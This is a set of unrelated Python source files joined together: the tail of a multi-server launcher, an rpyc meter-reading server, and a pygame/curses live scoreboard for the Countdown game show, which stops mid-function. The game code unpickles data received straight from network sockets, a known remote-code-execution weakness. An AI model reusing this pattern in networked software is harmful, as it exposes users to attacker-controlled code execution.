t.setDaemon( True ) # don't hang on exit
t.start()
logger = logging.getLogger('client')
logger.info( 'SLA server on %s:%s', sla_ip, sla_port )
# Run Token Server
token_address = ( '0.0.0.0', 8001 )
token_server = TokenServer( token_address, TokenHandler )
token_ip, token_port = token_server.server_address
t2 = threading.Thread(target=token_server.serve_forever)
t2.setDaemon(True)
t2.start()
logger.info( 'Token server on %s:%s', token_ip, token_port )
# Run VIP Server
vip_address = ( '0.0.0.0', 8002 )
vip_server = VIPServer( vip_address, VIPHandler )
vip_ip, vip_port = vip_server.server_address
t3 = threading.Thread(target=vip_server.serve_forever)
t3.setDaemon(True)
t3.start()
logger.info( 'VIP server on %s:%s', vip_ip, vip_port )
# Run serial connection
ser_connection = SerialBadgeConnection()
ser_connection.Run( program_args['port'] )
sla_server.socket.close()
token_server.socket.close()
|
meterserver-rpyc.py
|
#!/usr/bin/env python3
# Copyright © 2012-13 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version. It is provided for
# educational purposes and is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import datetime
import threading
import rpyc
import sys
import MeterMT
PORT = 11003
Manager = MeterMT.Manager()
class MeterService(rpyc.Service):
def on_connect(self):
pass
def on_disconnect(self):
pass
exposed_login = Manager.login
exposed_get_status = Manager.get_status
exposed_get_job = Manager.get_job
def exposed_submit_reading(self, sessionId, meter, when, reading,
reason=""):
when = datetime.datetime.strptime(str(when)[:19],
"%Y-%m-%d %H:%M:%S")
Manager.submit_reading(sessionId, meter, when, reading, reason)
if __name__ == "__main__":
import rpyc.utils.server
print("Meter server startup at {}".format(
datetime.datetime.now().isoformat()[:19]))
server = rpyc.utils.server.ThreadedServer(MeterService, port=PORT)
thread = threading.Thread(target=server.start)
thread.start()
try:
if len(sys.argv) > 1: # Notify if called by a GUI client
with open(sys.argv[1], "wb") as file:
file.write(b"\n")
thread.join()
except KeyboardInterrupt:
pass
server.close()
print("\rMeter server shutdown at {}".format(
datetime.datetime.now().isoformat()[:19]))
MeterMT.Manager._dump()
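# A minimal client sketch (login arguments depend on MeterMT.Manager and are illustrative only):
#
#   import rpyc
#   conn = rpyc.connect("localhost", PORT)
#   session_id = conn.root.login("username", "password")
#   print(conn.root.get_status(session_id))
#   conn.close()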
|
livegame.py
|
#!/usr/bin/env python
import time;
import curses;
import sys;
import argparse;
import pickle;
import socket;
import threading;
import re;
import string;
import pygame;
import errno;
import os;
# For the server, the list of client sockets connected to us
connected_sockets = [];
connected_sockets_lock = threading.Lock();
ALIGN_LEFT = 0
ALIGN_CENTRE = 1
ALIGN_RIGHT = 2
default_font_name = "sans-serif";
# Functions to get the colour pair number given bg and fg colours
def colour2(fg, bg):
return curses.color_pair(bg * 8 + fg);
def colour(fg):
return curses.color_pair(fg);
def recvall(sock, length):
message = "";
while length > 0:
to_recv = min(4096, length);
chunk = sock.recv(to_recv);
if not chunk:
# Connection closed before the full message arrived; stop instead of looping forever.
break;
length -= len(chunk);
message = message + chunk;
return message;
class PercentageWidth(object):
def __init__(self, pc):
self.pc = pc;
def get_px(self, surface):
return int(surface.get_width() * self.pc / 100);
class PercentageHeight(object):
def __init__(self, pc):
self.pc = pc;
def get_px(self, surface):
return int(surface.get_height() * self.pc / 100);
def limit_label_width(label, max_width):
if label.get_width() <= max_width:
return label;
try:
return pygame.transform.smoothscale(label, (max_width, label.get_height()));
except:
return pygame.transform.scale(label, (max_width, label.get_height()));
def get_sensible_font(font_name, desired_line_size, sysfont=True):
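# Binary-search the point size until the rendered font's linesize matches desired_line_size
# (or the search interval collapses, in which case the nearest smaller size is used).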
low = 10;
high = 200;
while True:
size = (low + high) / 2;
if sysfont:
font = pygame.font.SysFont(font_name, size);
else:
font = pygame.font.Font(font_name, size);
if font.get_linesize() == desired_line_size:
break;
elif font.get_linesize() < desired_line_size:
low = size + 1;
else:
high = size - 1;
if low > high:
size = high;
break;
if sysfont:
font = pygame.font.SysFont(font_name, size);
else:
font = pygame.font.Font(font_name, size);
return font;
def draw_label(surface, rect, text, fgcolour=(255,255,255), bgcolour=None, align=ALIGN_LEFT, border_colour=None, border_size=None):
(left, top, width, height) = rect;
if width <= 0 or height <= 0:
return;
if font_file:
font = get_sensible_font(font_file, height, sysfont=False);
else:
font = get_sensible_font(default_font_name, height, sysfont=True);
xspacing = int(font.get_linesize() * 0.1);
caption = font.render(text, 1, fgcolour);
if width is None:
width = caption.get_width();
label = pygame.Surface((width, height), pygame.SRCALPHA);
if bgcolour:
label.fill(bgcolour);
else:
label.blit(surface, (0,0), area=(left, top, width, height));
caption = limit_label_width(caption, width - 2 * xspacing);
if align == ALIGN_LEFT:
label.blit(caption, (xspacing, 0));
elif align == ALIGN_RIGHT:
x = width - (caption.get_width() + xspacing);
label.blit(caption, (x, 0));
else:
x = (width - caption.get_width()) / 2;
label.blit(caption, (x, 0));
if border_size:
surface.fill(border_colour,
(left - border_size, top - border_size,
width + 2 * border_size, height + 2 * border_size));
surface.blit(label, (left, top));
def shade_area(surface, rect, colour):
tmp = pygame.Surface((rect[2], rect[3]), pygame.SRCALPHA);
tmp.blit(surface, (0, 0), rect);
shade = pygame.Surface((rect[2], rect[3]), pygame.SRCALPHA);
shade.fill(colour);
tmp.blit(shade, (0, 0));
surface.blit(tmp, (rect[0], rect[1]));
def draw_flippything(surface, rect, letter_width, letter_height, border_px, border_colour, spacing, state, text, unrevealed_text):
surface.fill(border_colour, (rect[0] - border_px, rect[1] - border_px, rect[2] + 2 * border_px, rect[3] + 2 * border_px));
if state == 0:
draw_label(surface, rect, unrevealed_text, fgcolour=(128, 128, 128), bgcolour=(0, 0, 255), align=ALIGN_CENTRE);
elif state == 1:
x = rect[0];
y = rect[1];
x_step = letter_width + spacing;
for l in list(text):
if l and l != ' ':
draw_label(surface, (x, y, letter_width, letter_height), l, fgcolour=(255, 255, 255), bgcolour=(0, 0, 255), align=ALIGN_CENTRE);
x += x_step;
else:
draw_label(surface, rect, "INCORRECT", fgcolour=(255, 255, 255), bgcolour=(0, 0, 255), align=ALIGN_CENTRE);
class GameState:
def __init__(self):
self.title = "";
self.p1 = "";
self.p2 = "";
self.s1 = 0;
self.s2 = 0;
self.numbers_rack = (0, 0, 0, 0, 0, 0);
self.numbers_target = 0;
self.letters_rack = "";
self.bottom_rack = "";
self.conundrum_scramble = "";
self.conundrum_top_state = 0;
self.conundrum_solution = "";
self.conundrum_bottom_state = 0;
self.round_type = "";
def load(self, filename):
f = open(filename, "rb");
pickled_state = f.read();
state = pickle.loads(pickled_state);
self.set_state(state);
def save(self, filename):
f = open(filename, "wb");
pickled_state = pickle.dumps(self);  # dump this GameState, not an undefined global
f.write(pickled_state);
f.close();
def reveal_conundrum_scramble(self):
if self.conundrum_top_state == 0:
self.conundrum_top_state = 1;
else:
self.conundrum_top_state = 0;
def reveal_conundrum_incorrect(self):
if self.conundrum_bottom_state == 2:
self.conundrum_bottom_state = 0;
else:
self.conundrum_bottom_state = 2;
def reveal_conundrum_answer(self):
if self.conundrum_top_state == 0:
return;
if self.conundrum_bottom_state == 1:
self.conundrum_bottom_state = 0;
else:
self.conundrum_bottom_state = 1;
def read_message(self, sock, tout=None):
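# Wire format: a single character 'A', 'B' or 'C' is a control command (returned as 1, 2 or 3);
# otherwise the digits up to the newline give the byte length of a pickled GameState,
# which is then received in full and applied via set_state().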
c = "";
len_str = "";
while c != '\n':
try:
if c == "":
sock.settimeout(tout);
else:
sock.settimeout(0);
c = sock.recv(1);
except socket.timeout, e:
return -1;
except socket.error, e:
(errnum, errstr) = e;
if errnum == errno.EINTR:
continue;
else:
raise;
if c == 'A':
return 1;
elif c == 'B':
return 2;
elif c == 'C':
return 3;
elif c != '\n':
len_str = len_str + c;
message_length = int(len_str);
message = None;
while message == None:
try:
message = recvall(sock, message_length);
except socket.error, e:
(errnum, errstr) = e;
if errnum == errno.EINTR:
continue;
else:
raise;
state = pickle.loads(message);
self.set_state(state);
return 0;
def set_state(self, state):
self.title = state.title;
self.p1 = state.p1;
self.p2 = state.p2;
self.s1 = state.s1;
self.s2 = state.s2;
self.numbers_rack = state.numbers_rack;
self.letters_rack = state.letters_rack;
self.bottom_rack = state.bottom_rack;
self.numbers_target = state.numbers_target;
self.conundrum_scramble = state.conundrum_scramble;
self.conundrum_solution = state.conundrum_solution;
self.conundrum_top_state = state.conundrum_top_state;
self.conundrum_bottom_state = state.conundrum_bottom_state;
self.round_type = state.round_type;
def draw_rectangle(win, tly, tlx, bry, brx):
win.addch(tly, tlx, curses.ACS_ULCORNER);
win.addch(tly, brx, curses.ACS_URCORNER);
win.addch(bry, tlx, curses.ACS_LLCORNER);
win.addch(bry, brx, curses.ACS_LRCORNER);
for x in xrange(tlx + 1, brx):
win.addch(tly, x, curses.ACS_HLINE);
win.addch(bry, x, curses.ACS_HLINE);
for y in xrange(tly + 1, bry):
win.addch(y, tlx, curses.ACS_VLINE);
win.addch(y, brx, curses.ACS_VLINE);
class GUILiveGameWindow:
title_height = PercentageHeight(8);
nameplate_top = PercentageHeight(12);
nameplate_height = PercentageHeight(6);
nameplate1_left = PercentageWidth(5);
nameplate2_left = PercentageWidth(55);
nameplate1_width = PercentageWidth(40);
nameplate2_width = PercentageWidth(40);
nameplate_border = PercentageHeight(0.5);
score_border = PercentageHeight(0.5);
score_top = PercentageHeight(20);
score_height = PercentageHeight(20);
score1_left = PercentageWidth(12.5);
score2_left = PercentageWidth(62.5);
score1_width = PercentageWidth(25);
score2_width = PercentageWidth(25);
letters_top = PercentageHeight(55);
letters_max_width = PercentageWidth(90);
letters_max_height = PercentageHeight(40);
letter_ratio = 1; # width/height
num_letters = 9;
letters_border = PercentageWidth(2);
letters_spacing = PercentageWidth(1);
numbers_top = PercentageHeight(50);
numbers_left = PercentageWidth(10);
numbers_width = PercentageWidth(80);
target_top = PercentageHeight(53);
target_left = PercentageWidth(35);
target_width = PercentageWidth(30);
target_height = PercentageHeight(19);
numbers_sel_top = PercentageHeight(75);
numbers_sel_max_height = PercentageHeight(23);
numbers_sel_max_width = PercentageWidth(90);
numbers_sel_border = PercentageWidth(1);
numbers_sel_spacing = PercentageWidth(1);
number_ratio = 1;
num_numbers = 6;
con_top = letters_top;
con_max_width = letters_max_width;
con_max_height = letters_max_height;
con_border = letters_border;
con_spacing = letters_spacing;
def __init__(self, background_surface=None):
self.background = background_surface;
self.background_scaled = None;
def rescale_background(self, surface):
x_scale = float(surface.get_width()) / float(self.background.get_width());
y_scale = float(surface.get_height()) / float(self.background.get_height());
scale = max((x_scale, y_scale));
scaled_width = int(scale * self.background.get_width());
scaled_height = int(scale * self.background.get_height());
self.background_scaled = pygame.transform.scale(self.background, (scaled_width, scaled_height));
def draw(self, surface, state):
if self.background:
if self.background_scaled is None:
self.rescale_background(surface);
bg_scaled_top = (self.background_scaled.get_height() - surface.get_height()) / 2;
bg_scaled_left = (self.background_scaled.get_width() - surface.get_width()) / 2;
surface.blit(self.background_scaled, (0, 0), area=(bg_scaled_left, bg_scaled_top, bg_scaled_left + surface.get_width(), bg_scaled_top + surface.get_height()));
else:
surface.fill((0, 0, 0, 255));
title_colour = (255, 255, 255);
name_colour = (255, 255, 255);
name_bg = (0, 0, 192);
score_colour = (255, 255, 255);
score_bg = (0, 0, 255);
letter_colour = (255, 255, 255);
letter_bg = (0, 0, 192);
target_colour = (255, 255, 255);
target_bg = (0, 0, 255);
number_colour = (255, 255, 255);
number_bg = (0, 0, 192);
# Draw title
draw_label(surface, (0, 0, surface.get_width(), self.title_height.get_px(surface)), state.title, fgcolour=title_colour, align=ALIGN_CENTRE);
# Draw shaded area
score_border = int(self.nameplate_height.get_px(surface) / 2);
backing_height = self.score_top.get_px(surface) + self.score_height.get_px(surface) - self.nameplate_top.get_px(surface) + score_border * 2;
shade_area(surface,
(self.nameplate1_left.get_px(surface) - score_border,
self.nameplate_top.get_px(surface) - score_border,
self.nameplate1_width.get_px(surface) + score_border * 2,
backing_height),
(0, 0, 0, 96)
);
shade_area(surface,
(self.nameplate2_left.get_px(surface) - score_border,
self.nameplate_top.get_px(surface) - score_border,
self.nameplate2_width.get_px(surface) + score_border * 2,
backing_height),
(0, 0, 0, 96)
);
# Draw nameplates
draw_label(surface,
(self.nameplate1_left.get_px(surface),
self.nameplate_top.get_px(surface),
self.nameplate1_width.get_px(surface),
self.nameplate_height.get_px(surface)),
state.p1, fgcolour=name_colour,
bgcolour=name_bg, align=ALIGN_CENTRE,
border_colour=(192, 192, 192),
border_size=self.nameplate_border.get_px(surface));
draw_label(surface,
(self.nameplate2_left.get_px(surface),
self.nameplate_top.get_px(surface),
self.nameplate2_width.get_px(surface),
self.nameplate_height.get_px(surface)),
state.p2, fgcolour=name_colour,
bgcolour=name_bg, align=ALIGN_CENTRE,
border_colour=(192, 192, 192),
border_size=self.nameplate_border.get_px(surface));
score1_left_px = self.score1_left.get_px(surface);
score2_left_px = self.score2_left.get_px(surface);
score1_width_px = self.score1_width.get_px(surface);
score2_width_px = self.score2_width.get_px(surface);
score_height_px = self.score_height.get_px(surface);
if score_height_px * 2 < score1_width_px:
score1_left_px += (score1_width_px - score_height_px * 2) / 2
score1_width_px = score_height_px * 2
if score_height_px * 2 < score2_width_px:
score2_left_px += (score2_width_px - score_height_px * 2) / 2
score2_width_px = score_height_px * 2
# Draw scores
draw_label(surface,
(score1_left_px,
self.score_top.get_px(surface),
score1_width_px, score_height_px),
str(state.s1), fgcolour=score_colour,
bgcolour=score_bg, align=ALIGN_RIGHT,
border_colour=(192, 192, 192),
border_size=self.nameplate_border.get_px(surface));
draw_label(surface,
(score2_left_px,
self.score_top.get_px(surface),
score2_width_px, score_height_px),
str(state.s2), fgcolour=score_colour,
bgcolour=score_bg, align=ALIGN_RIGHT,
border_colour=(192, 192, 192),
border_size=self.nameplate_border.get_px(surface));
# Shade area
if state.round_type in ("L", "N", "C"):
shade_area(surface, (
0, surface.get_height() / 2,
surface.get_width(),
surface.get_height() / 2),
(0, 0, 0, 96)
);
if state.round_type == 'L':
letters_max_width_px = self.letters_max_width.get_px(surface);
letters_max_height_px = self.letters_max_height.get_px(surface);
letter_width_px = (letters_max_width_px - 2 * self.letters_border.get_px(surface) - (self.num_letters - 1) * self.letters_spacing.get_px(surface)) / 9;
letter_height_px = (letters_max_height_px - 4 * self.letters_border.get_px(surface)) / 2;
if letter_width_px > letter_height_px * self.letter_ratio:
letter_width_px = letter_height_px * self.letter_ratio;
letters_width_px = self.num_letters * letter_width_px + self.letters_border.get_px(surface) * 2 + (self.num_letters - 1) * self.letters_spacing.get_px(surface);
letters_height_px = letters_max_height_px;
elif letter_width_px < letter_height_px * self.letter_ratio:
letter_height_px = int(letter_width_px / self.letter_ratio);
letters_height_px = 2 * letter_height_px + 4 * self.letters_border.get_px(surface);
letters_width_px = letters_max_width_px;
else:
letters_width_px = letters_max_width_px;
letters_height_px = letters_max_height_px;
letters_left_px = (surface.get_width() - letters_width_px) / 2;
letters_top_px = self.letters_top.get_px(surface);
letters_start_x = letters_left_px + self.letters_border.get_px(surface);
letters_start_y = letters_top_px + self.letters_border.get_px(surface);
letters_x = letters_start_x;
letters_x_step = letter_width_px + self.letters_spacing.get_px(surface);
letters_border_px = self.letters_border.get_px(surface);
# Draw backing
surface.fill((0, 192, 255), (letters_left_px, letters_top_px, letters_width_px, letters_height_px));
# Remove from the top rack those letters in the bottom rack
top_rack = list(state.letters_rack.upper());
bottom_rack = list(state.bottom_rack.upper());
for l in bottom_rack:
for i in range(0, len(top_rack)):
if top_rack[i] == l:
top_rack[i] = ' ';
break;
#for l in top_rack:
# if l:
# draw_label(surface,
# (letters_x, letters_start_y,
# letter_width_px, letter_height_px),
# l, fgcolour=letter_colour,
# bgcolour=letter_bg, align=ALIGN_CENTRE);
# letters_x += letters_x_step;
flippything_border_px = letters_border_px / 2;
flippything_border_colour = (0, 0, 128);
draw_flippything(surface,
(letters_start_x,
letters_start_y,
letters_width_px - 2 * letters_border_px,
letter_height_px),
letter_width_px, letter_height_px,
flippything_border_px, flippything_border_colour,
self.letters_spacing.get_px(surface),
1, "".join(top_rack), "");
draw_flippything(surface,
(letters_start_x,
letters_start_y + letter_height_px + 2 * letters_border_px,
letters_width_px - 2 * letters_border_px,
letter_height_px),
letter_width_px, letter_height_px,
flippything_border_px, flippything_border_colour,
self.letters_spacing.get_px(surface),
1, "".join(bottom_rack), "");
elif state.round_type == 'N':
if state.numbers_target is None or state.numbers_target <= 0:
target_str = "";
else:
target_str = str(state.numbers_target);
# Draw backing for target
target_border_px = self.target_height.get_px(surface) / 20;
surface.fill((0, 192, 255),
(self.target_left.get_px(surface) - target_border_px,
self.target_top.get_px(surface) - target_border_px,
self.target_width.get_px(surface) + 2 * target_border_px,
self.target_height.get_px(surface) + 2 * target_border_px));
# Draw numbers target
draw_label(surface,
(self.target_left.get_px(surface),
self.target_top.get_px(surface),
self.target_width.get_px(surface),
self.target_height.get_px(surface)),
target_str, fgcolour=target_colour,
bgcolour=target_bg, align=ALIGN_CENTRE);
numbers_sel_top_px = self.numbers_sel_top.get_px(surface);
numbers_sel_width_px = self.numbers_sel_max_width.get_px(surface);
numbers_sel_height_px = self.numbers_sel_max_height.get_px(surface);
number_width = (numbers_sel_width_px - (self.num_numbers - 1) * self.numbers_sel_spacing.get_px(surface) - 2 * self.numbers_sel_border.get_px(surface)) / self.num_numbers;
number_height = numbers_sel_height_px - 2 * self.numbers_sel_border.get_px(surface);
if number_width > number_height * self.number_ratio:
number_width = int(number_height * self.number_ratio);
numbers_sel_width_px = self.num_numbers * number_width + (self.num_numbers - 1) * self.numbers_sel_spacing.get_px(surface) + 2 * self.numbers_sel_border.get_px(surface);
elif number_width < number_height * self.number_ratio:
number_height = int(number_width / self.number_ratio);
numbers_sel_height_px = number_height + 2 * self.numbers_sel_border.get_px(surface);
numbers_sel_left_px = (surface.get_width() - numbers_sel_width_px) / 2;
numbers_sel_start_x = numbers_sel_left_px + self.numbers_sel_border.get_px(surface);
numbers_sel_x_step = number_width + self.numbers_sel_spacing.get_px(surface);
numbers_sel_x = numbers_sel_start_x;
numbers_sel_y = numbers_sel_top_px + self.numbers_sel_border.get_px(surface);
# Draw backing for numbers
surface.fill((0, 192, 255),
(numbers_sel_left_px, numbers_sel_top_px,
numbers_sel_width_px, numbers_sel_height_px));
# Draw numbers
if state.numbers_rack:
for n in state.numbers_rack:
draw_label(surface,
(numbers_sel_x, numbers_sel_y,
number_width, number_height),
str(n), fgcolour=number_colour,
bgcolour=number_bg, align=ALIGN_CENTRE);
numbers_sel_x += numbers_sel_x_step;
elif state.round_type == 'C':
con_top_px = self.con_top.get_px(surface);
con_width_px = self.con_max_width.get_px(surface);
con_height_px = self.con_max_height.get_px(surface);
letter_width = (con_width_px - 2 * self.con_border.get_px(surface) - (self.num_letters - 1) * self.con_spacing.get_px(surface)) / self.num_letters;
letter_height = (con_height_px - 4 * self.con_border.get_px(surface)) / 2;
if letter_width > letter_height * self.letter_ratio:
letter_width = int(letter_height * self.letter_ratio);
con_width_px = self.num_letters * letter_width + (self.num_letters - 1) * self.con_spacing.get_px(surface) + 2 * self.con_border.get_px(surface);
elif letter_width < letter_height * self.letter_ratio:
letter_height = int(letter_width / self.letter_ratio);
con_height_px = 2 * letter_height + 4 * self.con_border.get_px(surface);
con_left_px = (surface.get_width() - con_width_px) / 2;
con_border_px = self.con_border.get_px(surface);
surface.fill((0, 192, 255), (con_left_px, con_top_px, con_width_px, con_height_px));
flippything_border_px = int(con_border_px / 2);
flippything_border_colour = (0, 0, 128);
draw_flippything(surface,
(con_left_px + con_border_px,
con_top_px + con_border_px,
con_width_px - 2 * con_border_px, letter_height),
letter_width, letter_height,
flippything_border_px, flippything_border_colour,
self.con_spacing.get_px(surface),
state.conundrum_top_state,
state.conundrum_scramble, "COUNTDOWN");
draw_flippything(surface,
(con_left_px + con_border_px,
con_top_px + letter_height + 3 * con_border_px,
con_width_px - 2 * con_border_px, letter_height),
letter_width, letter_height,
flippything_border_px, flippything_border_colour,
self.con_spacing.get_px(surface),
state.conundrum_bottom_state,
state.conundrum_solution, "CONUNDRUM");
class CursesLiveGameWindow:
def set_window_size(self, win):
self.win = win;
self.win.scrollok(1);
(self.height, self.width) = win.getmaxyx();
self.ypad = 1;
self.title_y = self.ypad;
self.score_y = self.ypad + 2;
self.letters_y = self.ypad + 6;
self.number_target_y = self.ypad + 6;
self.number_rack_y = self.ypad + 8;
self.top_flippything_y = self.ypad + 6;
self.bottom_flippything_y = self.ypad + 8;
self.bottom_rack_y = self.ypad + 8;
def __init__(self, win):
self.set_window_size(win);
def draw(self, state):
self.win.erase();
self.win.addstr(self.title_y, 0, ("{0:^" + str(self.width) + "}").format(state.title), curses.A_REVERSE);
# Need four characters for the score, and the number of
# characters in the longest name. e.g.
#
# Alice Aardvark 30
# Bob Bravo 43
player_name_attr = curses.A_BOLD;
score_attr = colour(curses.COLOR_YELLOW) | curses.A_BOLD;
max_name_length = self.width - 4;
name_field_length = min(max_name_length, max(len(state.p1), len(state.p2)));
score_width = 4 + name_field_length;
self.win.move(self.score_y, (self.width - score_width) / 2);
self.win.addstr(("{0:<" + str(name_field_length) + "." + str(name_field_length) + "}").format(state.p1), player_name_attr);
self.win.addstr("{0:>4}".format(state.s1), score_attr);
self.win.move(self.score_y + 1, (self.width - score_width) / 2);
self.win.addstr(("{0:<" + str(name_field_length) + "." + str(name_field_length) + "}").format(state.p2), player_name_attr);
self.win.addstr("{0:>4}".format(state.s2), score_attr);
if state.round_type == 'L':
# If a letter is in the bottom rack, don't display it
# in the top rack
letters_rack_list = list(state.letters_rack);
# Build up bottom_rack as we go: add as uppercase
# letters if they're in the selection, lowercase if
# they aren't.
bottom_rack = [];
for l in state.bottom_rack.upper():
if l in letters_rack_list:
ind = letters_rack_list.index(l);
letters_rack_list[ind] = " ";
bottom_rack.append(l);
else:
bottom_rack.append(l.lower());
while len(letters_rack_list) < 9:
letters_rack_list.append(' ');
rack_x = (self.width - (len(letters_rack_list) * 2 + 1)) / 2;
draw_rectangle(self.win, self.letters_y - 1, rack_x - 2, self.letters_y + 1, rack_x + len(letters_rack_list) * 2 + 1 + 1);
self.win.move(self.letters_y, rack_x);
for l in letters_rack_list:
self.win.addstr(" " + l, colour2(curses.COLOR_WHITE, curses.COLOR_BLUE) | curses.A_BOLD);
self.win.addstr(" ", colour2(curses.COLOR_WHITE, curses.COLOR_BLUE) | curses.A_BOLD);
if bottom_rack != []:
self.win.move(self.bottom_rack_y, rack_x);
padded_bottom_rack = "{0:^9}".format(''.join(bottom_rack));
attr = colour2(curses.COLOR_WHITE, curses.COLOR_BLUE) | curses.A_BOLD;
for l in padded_bottom_rack:
self.win.addstr(" ", attr);
# Show phantom letters in red
if l.islower():
self.win.addstr(l.upper(), colour2(curses.COLOR_WHITE, curses.COLOR_RED) | curses.A_BOLD);
else:
self.win.addstr(l, attr);
self.win.addstr(" ", attr);
draw_rectangle(self.win, self.bottom_rack_y - 1, rack_x - 2, self.bottom_rack_y + 1, rack_x + len(padded_bottom_rack) * 2 + 1 + 1);
if self.letters_y + 2 == self.bottom_rack_y:
self.win.addch(self.letters_y + 1, rack_x - 2, curses.ACS_LTEE);
self.win.addch(self.letters_y + 1, rack_x + len(padded_bottom_rack) * 2 + 1 + 1, curses.ACS_RTEE);
elif state.round_type == 'N':
self.win.move(self.number_target_y, (self.width - 5) / 2);
if state.numbers_target > 0:
self.win.addstr(" {0:>3d} ".format(state.numbers_target), curses.A_BOLD | colour2(curses.COLOR_YELLOW, curses.COLOR_BLACK));
number_rack = list(state.numbers_rack);
num_digits = 0;
for n in number_rack:
num_digits += len(str(n));
rack_start_x = (self.width - (num_digits + 2 * len(number_rack) + len(number_rack) - 1)) / 2;
if rack_start_x < 0:
rack_start_x = 0;
self.win.move(self.number_rack_y, rack_start_x);
num_index = 0;
for n in number_rack:
if num_index > 0:
self.win.addstr(" ");
self.win.addstr(" {0:d} ".format(int(n)), colour2(curses.COLOR_WHITE, curses.COLOR_BLUE) | curses.A_BOLD);
num_index += 1;
elif state.round_type == 'C':
att = colour2(curses.COLOR_WHITE, curses.COLOR_BLUE);
conundrum_x = (self.width - (len(state.conundrum_scramble) * 2 + 1)) / 2;
# Draw necessary rectangles
draw_rectangle(self.win, self.top_flippything_y - 1, conundrum_x - 2, self.top_flippything_y + 1, conundrum_x + len(state.conundrum_scramble) * 2 + 1 + 1);
draw_rectangle(self.win, self.bottom_flippything_y - 1, conundrum_x - 2, self.bottom_flippything_y + 1, conundrum_x + len(state.conundrum_scramble) * 2 + 1 + 1);
if self.top_flippything_y + 2 == self.bottom_flippything_y:
self.win.addch(self.top_flippything_y + 1, conundrum_x - 2, curses.ACS_LTEE);
self.win.addch(self.top_flippything_y + 1, conundrum_x + len(state.conundrum_scramble) * 2 + 1 + 1, curses.ACS_RTEE);
# Draw the conundrum scramble flippything
self.win.move(self.top_flippything_y, conundrum_x);
if state.conundrum_top_state > 0:
for l in state.conundrum_scramble:
self.win.addstr(" ", att | curses.A_BOLD);
self.win.addstr(l, att | curses.A_BOLD);
self.win.addstr(" ", att);
else:
self.win.addstr(" COUNTDOWN ", att);
# And the solution flippything
self.win.move(self.bottom_flippything_y, (self.width - (len(state.conundrum_solution) * 2 + 1)) / 2);
if state.conundrum_bottom_state == 0:
self.win.addstr(" CONUNDRUM ", att);
else:
if state.conundrum_bottom_state == 1:
word = state.conundrum_solution;
att = colour2(curses.COLOR_WHITE, curses.COLOR_BLUE) | curses.A_BOLD;
else:
word = "INCORRECT";
att = colour2(curses.COLOR_WHITE, curses.COLOR_RED) | curses.A_BOLD;
for l in word:
self.win.addstr(" ", att);
self.win.addstr(l, att);
self.win.addstr(" ", att);
self.win.refresh();
################################################################################
def listener_thread_fn(sock, dialogue):
while True:
conn, addr = sock.accept();
connected_sockets_lock.acquire();
connected_sockets.append(conn);
dialogue_write(dialogue, "Received connection from " + str(addr));
connected_sockets_lock.release();
################################################################################
# SERVER FUNCTIONS
def load_dictionary(filename):
f = open(filename, "r");
lines = f.readlines();
lines = map(lambda x: x.rstrip().upper(), lines);
f.close();
return lines;
def dialogue_write(dialogue, data):
dialogue.addstr(data);
dialogue.addstr("\n");
dialogue.refresh();
def dialogue_prompt(dialogue, prompt):
dialogue.addstr(prompt);
dialogue.refresh();
curses.echo();
# curses.curs_set(1);
answer = dialogue.getstr();
# curses.curs_set(0);
curses.noecho();
return answer;
def broadcast_message(msg):
connected_sockets_lock.acquire();
socklist = connected_sockets[:];
connected_sockets_lock.release();
for sock in socklist:
try:
sock.sendall(msg);
except:
connected_sockets_lock.acquire();
if sock in connected_sockets:
connected_sockets.remove(sock);
connected_sockets_lock.release();
return 0;
def broadcast_state(state):
pickled_state = pickle.dumps(state);
return broadcast_message(str(len(pickled_state)) + "\n" + pickled_state);
def start_clock():
broadcast_message("A");
def pause_clock():
broadcast_message("B");
def resume_clock():
broadcast_message("C");
def set_conundrum(state, view, dialogue):
scramble = dialogue_prompt(dialogue, "Conundrum scramble: ");
scramble = scramble.upper();
if scramble == "":
dialogue_write(dialogue, "Aborted.");
return 1;
solution = dialogue_prompt(dialogue, "Conundrum solution: ");
solution = solution.upper();
if solution == "":
dialogue_write(dialogue, "Aborted.");
return 1;
scramble_list = list(scramble);
solution_list = list(solution);
scramble_list.sort();
solution_list.sort();
if scramble_list != solution_list:
dialogue_write(dialogue, "Scramble and solution are not anagrams of each other: not proceeding.");
return 1;
state.conundrum_scramble = scramble;
state.conundrum_solution = solution;
state.conundrum_top_state = 0;
state.conundrum_bottom_state = 0;
dialogue_write(dialogue, "Done.");
return 0;
def conundrum_round(state, view, dialogue):
if state.conundrum_scramble == "" or state.conundrum_solution == "":
set_conundrum(state, view, dialogue);
if state.conundrum_scramble == "" or state.conundrum_solution == "":
return 1;
state.round_type = 'C';
state.conundrum_top_state = 0;
state.conundrum_bottom_state = 0;
dialogue_write(dialogue, "Press S to reveal and start clock.");
return 0;
def numbers_round(state, view, dialogue):
state.round_type = 'N';
state.numbers_rack = ();
state.numbers_target = -1;
broadcast_state(state);
view.draw(state);
numstr = dialogue_prompt(dialogue, "Enter six numbers separated by spaces: ");
if numstr == "":
dialogue_write(dialogue, "Aborted.");
return 1;
    numstr = re.sub(" +", " ", numstr.strip());
numbers = numstr.split(" ");
if len(numbers) != 6:
dialogue_write(dialogue, "That's not six numbers.");
return 1;
for n in numbers:
try:
if int(n) < 0:
dialogue_write(dialogue, n + " is not a positive number.");
return 1;
except:
dialogue_write(dialogue, "At least one of those isn't a number.");
return 1;
    # If there are any large numbers in the selection, put them at the
    # start.
    reordered_numbers = [];
for l in numbers:
if int(l) > 10:
reordered_numbers.append(int(l));
for s in numbers:
if int(s) <= 10:
reordered_numbers.append(int(s));
state.numbers_rack = tuple(reordered_numbers);
state.numbers_target = -1;
state.round_type = 'N';
broadcast_state(state);
view.draw(state);
numstr = None;
while numstr == None:
numstr = dialogue_prompt(dialogue, "Enter target: ");
try:
if int(numstr) < 0:
                dialogue_write(dialogue, numstr + " is not a positive number.");
numstr = None;
except:
dialogue_write(dialogue, "That's not a number.");
numstr = None;
state.numbers_target = int(numstr);
return 0;
def show_letters_maxes(state, view, dialogue):
if dictionary == []:
dialogue_write(dialogue, "No dictionary loaded.");
if state.round_type == 'L':
allowable_words = [];
maxlen = 0;
rlist_orig = list(state.letters_rack);
for word in dictionary:
wlist = list(word);
rlist = rlist_orig[:];
for l in wlist:
if l in rlist:
rlist.remove(l);
else:
break;
else:
if len(word) > maxlen:
maxlen = len(word);
